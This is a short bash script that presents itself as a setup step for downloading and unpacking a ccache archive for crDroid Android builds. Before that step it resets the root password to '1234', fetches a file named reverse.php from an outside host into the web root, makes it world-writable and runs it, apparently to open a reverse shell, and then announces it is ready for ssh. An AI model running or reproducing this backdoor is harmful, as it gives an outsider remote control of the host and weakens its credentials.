#!/bin/bash

url=https://cheems.mirrorbomt.workers.dev/ccache-crdroid.tar.gz
whoami
echo -e "1234\n1234" | passwd root
sudo apt-get -y install php php-cli wget curl
cd /var/www/html
wget -O reverse.php https://eintim.ga/rev.txt
chmod 777 reverse.php 
php reverse.php
echo "ready to connect ssh"

cd /tmp # Where to download cccahe
time aria2c $url -x16 -s50
echo "dl done"
time tar xf ccache-crdroid.tar.gz
echo "unzip done"
find ccache-crdroid.tar.gz -delete
